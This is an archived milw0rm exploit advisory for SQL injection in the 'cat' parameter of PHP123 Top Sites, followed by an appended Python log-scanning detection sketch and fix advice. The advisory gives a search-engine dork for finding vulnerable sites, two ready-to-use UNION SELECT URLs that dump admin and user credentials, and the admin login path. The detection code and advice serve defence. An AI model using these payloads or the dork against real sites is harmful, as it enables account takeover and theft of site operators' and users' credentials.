--==+================================================================================+==--
--==+                 PHP123 Top Sites SQL Injection Vulnerability                   +==--
--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"

DESCRIPTION:
SQL injection in the cat parameter of category.php; pulls out admin/users login credentials.

EXPLOITS:
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*

NOTE/TIP:
Admin login is at /siteadmin/
AltaVista also returns a few different results; don't use the allintext: there, though.

GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !

# milw0rm.com [2007-07-28]
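
Detection sketch for the requests described above, added here as an example and not part of the original advisory or of PHP123's code. It assumes Apache-style access-log lines and that legitimate cat values are plain non-negative integers; the names classify_cat and scan and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Jul/2007:10:00:01 +0000] "GET /category.php?cat=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [28/Jul/2007:10:00:05 +0000] "GET /category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5/**/FROM/**/admin/* HTTP/1.1" 200 812',
    '198.51.100.9 - - [28/Jul/2007:10:00:09 +0000] "GET /category.php?cat=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FSeLeCt%2F%2A%2A%2F1 HTTP/1.1" 200 640',
    '203.0.113.4 - - [28/Jul/2007:10:01:00 +0000] "GET /index.php?cat=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Closed /*...*/ comments, plus an unterminated /* that runs to end of value.
INLINE_COMMENT_RE = re.compile(r'/\*.*?\*/|/\*.*$', re.S)
UNION_SELECT_RE = re.compile(r'\bunion\b(?:\s+all)?\s+select\b', re.I)

def classify_cat(value):
    """Return the reasons a cat value looks hostile (empty list = clean)."""
    reasons = []
    decoded = unquote_plus(value)  # second decode pass catches double encoding
    if not re.fullmatch(r'\d+', decoded):
        reasons.append('non-integer')
    # SQL comments stand in for whitespace, so normalise them before matching.
    normalized = INLINE_COMMENT_RE.sub(' ', decoded)
    if UNION_SELECT_RE.search(normalized):
        reasons.append('union-select')
    return reasons

def scan(lines, path='/category.php', param='cat'):
    """Return (line_number, client_ip, reasons) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != path:
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param:
                reasons = classify_cat(value)
                if reasons:
                    hits.append((number, line.split()[0], reasons))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application: casting cat to an integer or binding it as a query parameter before it reaches the SQL statement removes the injection point rather than only flagging it in logs.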